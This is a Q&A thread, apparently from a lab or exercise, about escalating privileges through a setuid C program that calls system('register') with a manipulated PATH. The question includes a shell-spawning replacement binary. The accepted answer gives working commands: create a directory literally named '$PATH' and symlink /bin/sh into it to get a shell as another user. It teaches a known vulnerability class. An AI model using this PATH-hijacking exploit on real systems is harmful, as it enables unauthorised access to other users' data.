# Artificially elevating permissions with SUID

Tags: c, directory

Maybe this should be on the askubuntu stack exchange but anyway...

I have the following directory structure:

```
bar@test:/$ cd /home/foo/Public
bar@test:/home/foo/Public$ ls -l
-rwsr-xr-x 1 foo foo 7632 Sep 30 foo-secret*
```

and

```
foo@test:/$ cd /home/foo/Private
foo@test:/home/foo/Private$ ls -l
-rws------ 1 foo foo 7084 Sep 30 register*
-rws------ 1 foo foo 7162 Sep 30 show-secret*
-rw------- 1 foo foo 1361 Sep 30 secret-file
```

If I run `./foo-secret badpassword` I get:

```
bar@test:/home/foo/Public$./foo-secret badpassword
You entered a bad password. Register new account (y/N)? y
Cannot register at this time.
bar@test:/home/foo/Public$
```

As bar, I cannot access foo's Private folder. Now, foo-secret takes a single argument which is foo's password (which I don't know). I know that `foo-secret` authenticates like this:

```
putenv("PATH=$PATH:/home/foo/Public:/home/foo/Private");

if (authenticate("foo", argv[1])) {
   system("show-secret");
} else {
   printf("You entered a bad password. Register new account (y/N)?");
   ans=getchar();
   if (ans == 'y') system("register");
}
```

I initially thought it would be simply enough create a new binary called `register` and put it in `/home/bar/bin` then add `home/bar/bin` to `PATH`, i.e.

```
bar@test:/home/bar$ mkdir bin
bar@test:/home/bar$ cd bin
bar@test:/home/bar/bin$ gcc register.c -o register
bar@test:/home/bar/bin$ chmod +x register
bar@test:/home/bar/bin$ cd /home/foo/Public
bar@test:/home/foo/Public$ export PATH=/home/bar/bin
```

With the new register.c being:

```
#include <stdio.h>

int main() {
   system("/bin/sh");
}
```

The idea is that, since I know `foo-secret` makes a system call to the `register` binary, I can make a new binary called `register` which opens a shell with my permissions changed/elevated to foo's (which means I could then read foo's `secret-file`). Nevertheless, running `./foo-secret badpassword` with the changed `PATH` still yields:

```
bar@test:/home/foo/Public$./foo-secret badpassword
You entered a bad password. Register new account (y/N)? y
Cannot register at this time.
bar@test:/home/foo/Public$
```

...rather than opening a shell as intended. I'm assuming its because the program itself adds to the PATH variable. My question therefore is: How do I force `foo-secret` to use my `register` rather than the one in `/home/foo/Private`?

Answer (score 1, accepted):

If the setuid `foo-secret` program C source indeed does

```
putenv("PATH=$PATH:/home/foo/Public:/home/foo/Private");
```

it means the PATH environment variable will begin with `$PATH:`, meaning the first directory shell looks for binaries in, is the directory `$PATH` under the current working directory.

(The directories in it are separated by colons. If a directory starts with a slash, it is absolute, i.e. starts at root; otherwise, it is relative to the current working directory.)

So, all you need to do is to use some directory you own, say your home directory, create a `$PATH` subdirectory there, and put a symlink named `register` there that points to a shell you'd like to use:

```
cd
mkdir '$PATH'
ln -s /bin/sh '$PATH/register'
/home/foo/public/foo-secret badpassword
```

If you then try to register, the line `system("register")` will end up executing the shell symlink. Because `foo-secret` is setuid foo, that shell will be run as user foo.

Answer (score 0):

foo-secret appends to PATH; so you should be able to:

```
PATH=/my/nefarious/path:${PATH} ./foo-secret badpass
```

and copy /bin/sh to /my/nefarious/path/register.
except that the code you show for foo-secret.c:

```
putenv("PATH=$PATH:/...");
```

Doesn't append to the PATH.  Variable assignment needs to be executed as a shell function; setting a static env-var will not help.
However, if you:

```
mkdir \$PATH
cp /bin/ls \$PATH/register
```

It should do what you hope.